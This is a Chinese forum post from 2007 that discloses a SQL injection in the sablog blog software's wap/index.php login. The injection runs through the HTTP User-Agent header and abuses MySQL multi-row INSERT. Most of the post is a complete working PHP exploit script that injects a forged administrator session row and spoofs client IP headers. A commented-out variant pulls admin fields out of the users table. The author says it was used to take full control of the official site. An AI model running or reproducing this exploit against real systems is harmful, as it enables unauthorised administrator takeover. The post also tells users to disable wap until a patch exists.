Quotation
第一:利用是PHP5,是因为_SERVER的变量不受'引号的限制,即便是开启了转义 漏洞出在User-Agent 第二:insert into的多个数据插入 文中构造的地方就是 insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$iprand','',1),('9c5b71e5',1,1,'211.43.206.202','9989581653', '$timestamp'); MYSQL支持 insert into [admin] (name,pass) values ('qq','bb'),('aa','cc') 这样的数据插入. ACCESS不可以.
sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取管理员权限:)
问题出在wap/index.php里的652行左右
------------
$hash = getuserhash($user['userid'], $user['username'], $user['password'], $user['logincount']+1);
$DB->query("delete FROM {$db_prefix}sessions where uid='".$user['userid']."' OR lastactivity+3600<'$timestamp' OR hash='$hash'");
$DB->query("insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$onlineip', '".$_SERVER['HTTP_USER_AGENT']."', '$timestamp')");
-------------
注意_SERVER变量是直接入库的,存在一个insert类型的注射,我们通过这个漏洞测试过了官方,顺利拿到了所有权限,呵呵.
这个地方要求是php5的,作者一时疏忽吧,贴出我们当时使用的exp
<!--p //from loveshell.net $url = $argv[1].'/wap/index.php'; $username = $argv[2]; $password = $argv[3]; echo" +----------------------------------------------------------------+\r\n"; echo" Uage: php.exe blogurl username password\r\n"; echo" example php.exe http://www.loveshell.net/blog test test\r\n"; echo" +----------------------------------------------------------------+\r\n"; if(!$username||!$password) die; echo" root@localhost:Post our content\r\n"; $str = 'username='.$username.'&password='.$password.'&action=login&do=login&'; $msg = myrequest($str,$url); echo $msg; if(strpos($msg,'登陆成功')!==false) echo" root@localhost:All Done!!! \r\n"; else echo" root@localhost:Login error!!! \r\n"; echo" +----------------------------------------------------------------+\r\n"; echo" Enjoy yourself.\r\n"; echo" +----------------------------------------------------------------+\r\n"; function myrequest($msg,$url,$type=2,$cookie=''){ //change type for post/get global $sql; $urls = initurl($url); $iprand = rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255); $fp = @fsockopen($urls['host'], $urls['port'], $errno, $errstr, 3); if($fp) { if($type==1){ fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n"); fputs($fp, "Host: $urls[host]\r\n"); fputs($fp, "Accept: */*\r\n"); fputs($fp, "Referer: $urls\r\n"); fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; [url=http://www.hack58.net/]Windows 98)\r\n"); fputs($fp, "CLIENT_IP: $iprand\r\n"); fputs($fp, "X_FORWARDED-FOR: $iprand\r\n"); fputs($fp, "Pragma: no-cache\r\n"); fputs($fp, "Cache-Control: no-cache\r\n"); fputs($fp, "Connection: Keep-Alive\r\n"); fputs($fp, "Cookie: $cookie\r\n\r\n"); }else{ fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n"); fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"); fputs($fp, "Referer: $urls[url]\r\n"); fputs($fp, "Accept-Language: zh-cn\r\n"); fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n"); // fputs($fp, "User-Agent: ',1),((select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,'211.43.206.208','123\r\n"); fputs($fp, "User-Agent: ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653\r\n"); fputs($fp, "CLIENT_IP: $iprand\r\n"); fputs($fp, "X_FORWARDED-FOR: $iprand\r\n"); fputs($fp, "Host: $urls[host]\r\n"); fputs($fp, "Content-Length: ".strlen($msg)."\r\n"); fputs($fp, "Connection: Keep-Alive\r\n"); fputs($fp, "Cache-Control: no-cache\r\n"); fputs($fp, "Cookie: $cookie\r\n\r\n"); fputs($fp, $msg."\r\n"); } } while($fp&&!feof($fp)) { $resp .= fread($fp,1024); } return $resp; } function initurl($url) { $newurl = ''; $blanks = array('url-->''); $urls = $blanks; if(strlen($url)<10) return $blanks; $urls = @parse_url($url); if(empty($urls) || !is_array($urls)) return $blanks; if(empty($urls['scheme'])) return $blanks; if($urls['scheme'] == 'file') return $blanks; $newurl .= $urls['scheme'].'://'; $newurl .= empty($urls['user'])?'':$urls['user']; $newurl .= empty($urls['pass'])?'':':'.$urls['pass']; $newurl .= empty($urls['host'])?'':((!empty($urls['user']) || !empty($urls['pass']))?'@':'').$urls['host']; $newurl .= empty($urls['port'])?'':':'.$urls['port']; $newurl .= empty($urls['path'])?'':$urls['path']; $newurl .= empty($urls['query'])?'':'?'.$urls['query']; $newurl .= empty($urls['fragment'])?'':'#'.$urls['fragment']; $urls['port'] = empty($urls['port'])?'80':$urls['port']; $urls['url'] = $newurl; return $urls; } ?>
这次还是比较有意思的,起码有以前没有出现过的知识点在3个以上,另外sablog的加密认证方式很薄弱,加上这个注射可以进后台的,作者需要改下哦.怕出问题的用户把wap禁用吧,exp的含义我就不分析了,仔细分析的话会有很有意思的东西哦..... |
发表于 2007-9-18 06:54:12